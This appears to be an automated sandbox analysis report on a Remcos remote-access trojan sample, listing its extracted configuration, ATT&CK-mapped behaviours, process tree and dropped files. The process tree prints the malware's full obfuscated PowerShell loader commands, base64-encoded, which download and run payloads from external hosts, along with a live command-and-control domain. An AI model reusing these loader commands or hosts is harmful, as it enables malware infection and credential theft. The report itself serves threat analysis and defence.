remcos | c76b7544fd10321bd84cd67c6662b7ceb4fe71a87789a09948c6ba690f0fb3ec

Analysis

max time kernel
149s
max time network
143s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
21-01-2025 03:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c76b7544fd10321bd84cd67c6662b7ceb4fe71a87789a09948c6ba690f0fb3ec.hta
Size

491KB
MD5

4b953e9801ac2ec60bf284162ed6793d
SHA1

090650754ac26c80128fed9b425000f3167551f4
SHA256

c76b7544fd10321bd84cd67c6662b7ceb4fe71a87789a09948c6ba690f0fb3ec
SHA512

f5d19a017a961229db0c10e06fe1da6a78693490d2928a6931ad5945ea93fa6b7bc193ae4c89f527702003293a05e7aba4618bba1c24508ef36015609ab4aa5a
SSDEEP

768:PnQVWUUGY6qZFKN9xv7RmzmBLStxuzHtu1Dj0YNYlBdNpdCb8sOUw8Qp3/GHxwv2:JRkKyMIBK2r0a8i4h

Score

10^/10

remcos zynova collection defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

zynova

millionairedreams2025.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-MGAETQ
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral1/memory/2036-61-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/1480-60-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2188-65-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/2036-61-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/1480-60-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	1724	powershell.exe
6	1456	powershell.exe
7	1456	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
1724	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1456	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1456 set thread context of 2972	1456	powershell.exe	40
PID 2972 set thread context of 1480	2972	CasPol.exe	41
PID 2972 set thread context of 2036	2972	CasPol.exe	42
PID 2972 set thread context of 2188	2972	CasPol.exe	44

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1724	powershell.exe
1724	powershell.exe
1724	powershell.exe
1456	powershell.exe
1480	CasPol.exe
1480	CasPol.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
2972	CasPol.exe
2972	CasPol.exe
2972	CasPol.exe
2972	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeDebugPrivilege	2188	CasPol.exe

Suspicious use of WriteProcessMemory 54 IoCs

description	pid	Process	procid_target
PID 2532 wrote to memory of 2940	2532	mshta.exe	30
PID 2532 wrote to memory of 2940	2532	mshta.exe	30
PID 2532 wrote to memory of 2940	2532	mshta.exe	30
PID 2532 wrote to memory of 2940	2532	mshta.exe	30
PID 2940 wrote to memory of 1724	2940	cmd.exe	32
PID 2940 wrote to memory of 1724	2940	cmd.exe	32
PID 2940 wrote to memory of 1724	2940	cmd.exe	32
PID 2940 wrote to memory of 1724	2940	cmd.exe	32
PID 1724 wrote to memory of 2716	1724	powershell.exe	33
PID 1724 wrote to memory of 2716	1724	powershell.exe	33
PID 1724 wrote to memory of 2716	1724	powershell.exe	33
PID 1724 wrote to memory of 2716	1724	powershell.exe	33
PID 2716 wrote to memory of 2540	2716	csc.exe	34
PID 2716 wrote to memory of 2540	2716	csc.exe	34
PID 2716 wrote to memory of 2540	2716	csc.exe	34
PID 2716 wrote to memory of 2540	2716	csc.exe	34
PID 1724 wrote to memory of 2632	1724	powershell.exe	36
PID 1724 wrote to memory of 2632	1724	powershell.exe	36
PID 1724 wrote to memory of 2632	1724	powershell.exe	36
PID 1724 wrote to memory of 2632	1724	powershell.exe	36
PID 2632 wrote to memory of 1456	2632	WScript.exe	37
PID 2632 wrote to memory of 1456	2632	WScript.exe	37
PID 2632 wrote to memory of 1456	2632	WScript.exe	37
PID 2632 wrote to memory of 1456	2632	WScript.exe	37
PID 1456 wrote to memory of 2972	1456	powershell.exe	40
PID 1456 wrote to memory of 2972	1456	powershell.exe	40
PID 1456 wrote to memory of 2972	1456	powershell.exe	40
PID 1456 wrote to memory of 2972	1456	powershell.exe	40
PID 1456 wrote to memory of 2972	1456	powershell.exe	40
PID 1456 wrote to memory of 2972	1456	powershell.exe	40
PID 1456 wrote to memory of 2972	1456	powershell.exe	40
PID 1456 wrote to memory of 2972	1456	powershell.exe	40
PID 1456 wrote to memory of 2972	1456	powershell.exe	40
PID 1456 wrote to memory of 2972	1456	powershell.exe	40
PID 1456 wrote to memory of 2972	1456	powershell.exe	40
PID 2972 wrote to memory of 1480	2972	CasPol.exe	41
PID 2972 wrote to memory of 1480	2972	CasPol.exe	41
PID 2972 wrote to memory of 1480	2972	CasPol.exe	41
PID 2972 wrote to memory of 1480	2972	CasPol.exe	41
PID 2972 wrote to memory of 1480	2972	CasPol.exe	41
PID 2972 wrote to memory of 2036	2972	CasPol.exe	42
PID 2972 wrote to memory of 2036	2972	CasPol.exe	42
PID 2972 wrote to memory of 2036	2972	CasPol.exe	42
PID 2972 wrote to memory of 2036	2972	CasPol.exe	42
PID 2972 wrote to memory of 2036	2972	CasPol.exe	42
PID 2972 wrote to memory of 1704	2972	CasPol.exe	43
PID 2972 wrote to memory of 1704	2972	CasPol.exe	43
PID 2972 wrote to memory of 1704	2972	CasPol.exe	43
PID 2972 wrote to memory of 1704	2972	CasPol.exe	43
PID 2972 wrote to memory of 2188	2972	CasPol.exe	44
PID 2972 wrote to memory of 2188	2972	CasPol.exe	44
PID 2972 wrote to memory of 2188	2972	CasPol.exe	44
PID 2972 wrote to memory of 2188	2972	CasPol.exe	44
PID 2972 wrote to memory of 2188	2972	CasPol.exe	44

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\c76b7544fd10321bd84cd67c6662b7ceb4fe71a87789a09948c6ba690f0fb3ec.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2532
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58+'uTf8.GEtStRinG([SySTEM.conVErt]'+[CHar]58+[chAr]0x3a+'fROmbaSE64StRINg('+[chAr]34+'JGdqUnh0USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZXJkZUZJbklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlscWVNcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUlpLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5bm8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbFUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRWSmJXenhxdmwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlB0dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIWnpOcERwU0VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRnalJ4dFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS43L3hhbXBwL2trYi9uaWNlZ2lybHdhbnRtZXRva2lzc2hlcmxpcHN3ZWxsd2l0aG15bGlwcy50SUYiLCIkZW5WOkFQUERBVEFcbmljZWdpcmx3YW50bWV0b2tpc3NoZXJsaXBzd2VsbHdpdGhteWxpcC52YlMiLDAsMCk7U3RBUlQtU2xlZXAoMyk7U1RhcnQtcHJPQ2VTcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pY2VnaXJsd2FudG1ldG9raXNzaGVybGlwc3dlbGx3aXRobXlsaXAudmJTIg=='+[ChAr]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2940
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58+'uTf8.GEtStRinG([SySTEM.conVErt]'+[CHar]58+[chAr]0x3a+'fROmbaSE64StRINg('+[chAr]34+'JGdqUnh0USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZXJkZUZJbklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlscWVNcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUlpLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5bm8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbFUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRWSmJXenhxdmwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlB0dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIWnpOcERwU0VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRnalJ4dFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS43L3hhbXBwL2trYi9uaWNlZ2lybHdhbnRtZXRva2lzc2hlcmxpcHN3ZWxsd2l0aG15bGlwcy50SUYiLCIkZW5WOkFQUERBVEFcbmljZWdpcmx3YW50bWV0b2tpc3NoZXJsaXBzd2VsbHdpdGhteWxpcC52YlMiLDAsMCk7U3RBUlQtU2xlZXAoMyk7U1RhcnQtcHJPQ2VTcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pY2VnaXJsd2FudG1ldG9raXNzaGVybGlwc3dlbGx3aXRobXlsaXAudmJTIg=='+[ChAr]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1724
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l3j_vhnq.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2716
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAB3E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAB3D.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2540
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicegirlwantmetokissherlipswellwithmylip.vbS"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2632
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA4ADgAMwAvADQAMgAzAC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAzADcAMQAyADQAOQA4ADAAJwA7ACAAdAByAHkAIAB7ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACAAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACAAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAaQBmACAAKAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAApACAAewAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACAAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJABtAGUAdABoAG8AZAAgAD0AIABbAFIAdQBtAHAALgBDAGwAYQBzAHMAOQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAHMAbQBlAHQAaABvAGQAXwAyACcAKQA7ACAAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdAEAAKAAnAHQAeAB0AC4AcwBnAG4AaQBoAHQAeQByAGUAdgBlAHIAbwBmAGwAawB1AGYAaQB0AHUAYQBlAGIAeQByAGUAdgBlAHIAYQBzAGwAcgBpAGcAdABoAGcAaQBuAC8AYgBrAGsALwBwAHAAbQBhAHgALwA3AC4ANQAxADIALgAwADEAMgAuADIAOQAxAC8ALwA6AHAAdAB0AGgAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBmAGEAbABzAGUAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkAOwAgAH0AIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBFAHIAcgBvADoAIAAkAF8AJwA7ACAAfQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1456
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:2972
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\cqpwmmojionkzgrdpypqdaiaamhcxdvgdp"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1480
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\nsvgne"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:2036
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\pmazoxker"
        7⤵
        
        PID:1704
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\pmazoxker"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2188

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESAB3E.tmp

Filesize
1KB

MD5
bdb36f64b5f754a2d2c2ef858720a5c4

SHA1
4768a40b9bcccd27e528ae228ef3a8b283e8b8d0

SHA256
aac6140192ac6c24753cfdecf7b648278e623b1eb59864a0fb9975f3f191a4c3

SHA512
babbd19220243e1a6c7606a9f5dc5ac5d5cb8dd41caaf9d7702cee5bcc91978513fbf68ebb0a9496a69a7b173ef0b29e2220f579b8609dd7680afcf38d4dfc83

Download Submit
C:\Users\Admin\AppData\Local\Temp\cqpwmmojionkzgrdpypqdaiaamhcxdvgdp

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\l3j_vhnq.dll

Filesize
3KB

MD5
f2c8d1b41b4635cfbf09467e71c8579a

SHA1
c13e9a02246da9461a823abcf9a135dd4abf27f2

SHA256
3c195fa7b8e762b7760371c68b5c1135c383b115c0731f21ee184959aaa5a423

SHA512
f88a9d273ab4a878d1b2d6618ae703986712c4018f7e8e1b1fc0376926b43cf28f7f95baa4578c4874004cdd745763960eecff9de9a3b7f77289a2c25dbb61fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\l3j_vhnq.pdb

Filesize
7KB

MD5
b10b8c2e3f79bdc312c5ef882141465f

SHA1
885c8286a99641fa288c491c0037789c07ccdbc6

SHA256
231040240ff8c6d11f71190a087b8566e581d83abdd67366c3629545c331ca5d

SHA512
5a295022c40f63e4e2a02ad160ed761f227eb4e2b278e3a135b48823a969a51cfc05dfd167597f3ff28fc765186b0798a7a49790f7e051d23b8afa8ec636dfe5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
c060745c1123155bd524c4d8e36ebb94

SHA1
3f7fbc3d571c98380327762b9ce1c631b9073efa

SHA256
54768a8068a69247f5bc56bd4fd85e24d82cab42366a6c5a1e8775cfa585540e

SHA512
0dbe0b0a0412916489e6d3618b9f466f0d6d547018d0ddc0739d54a5078d499545587b8e642395f6fc6c35528dbc4f2330b9ea3ec288a643661ca33a95079d8d

Download Submit
C:\Users\Admin\AppData\Roaming\nicegirlwantmetokissherlipswellwithmylip.vbS

Filesize
213KB

MD5
b14ef4fa92414ea1658977a049f15306

SHA1
11e59f935817673e2b68cfd36e4ce93d15034714

SHA256
a6f979fe5ca109e929031fd0811506343b3089a13300438be24070650c6b6bf3

SHA512
8b627fd09767ba773acdbcce52b646b1b819b261b72c17289d443a6c7e504f34b3402a64f73d48fef893d7d38dfbeef213ed5218c211558428307d69a03f9630

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCAB3D.tmp

Filesize
652B

MD5
1b026e37cfc41f07b35741379d964c0b

SHA1
c8f279b7871ae3a0ea2a849fe30a67b69cdb1f44

SHA256
1ff3423458e63e5ceebccc1a10bbfb8b60dce05a9682f3be9393292b3a1b9239

SHA512
0caa83559b73c709b7d96b9f8c5fee5c841e417c1e3b10c2f0fcfa69b9b208056d24b6ba64992231f44fa02daa21b0868377418ab2f79732b6c24d2c59ea2902

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l3j_vhnq.0.cs

Filesize
478B

MD5
680c55127532e413a19eddb51b0cb473

SHA1
7d279e255bc675f1c09df8b210ee4472b5d3b8b6

SHA256
fdd40f201088921031cf300fdce7ca0be6e458b70d0f5df699cf6a0cc33a7515

SHA512
27a542c554c27adf777c741eb218b7a0634392abced081722b43c51066dfb49d604473a9df4b4e257879355cb966882431286f7bbb2ed5d8a23840d837127205

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\l3j_vhnq.cmdline

Filesize
309B

MD5
65e438e620ba50492fbdea052ec89a3e

SHA1
21e19b0a96751ac0cf411e863463f4ba629dda79

SHA256
a0aa6f7544ffebaced4f6e963785bdc784b450dbeb2902a0a593c1fc4d801f8f

SHA512
16dd3b41241b2e403fc56fe4cfd20b36ec0f0363278f126b3f0340098157cdc0bea618c2c29be78086c20c5472c256c48bb9415a26ff83608e4f16f54e164411

Download Submit
memory/1480-60-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1480-58-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1480-55-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2036-56-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2036-57-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2036-61-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2036-59-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2188-64-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2188-65-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2188-63-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2972-53-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2972-35-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2972-48-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2972-49-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2972-52-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2972-46-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/2972-45-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
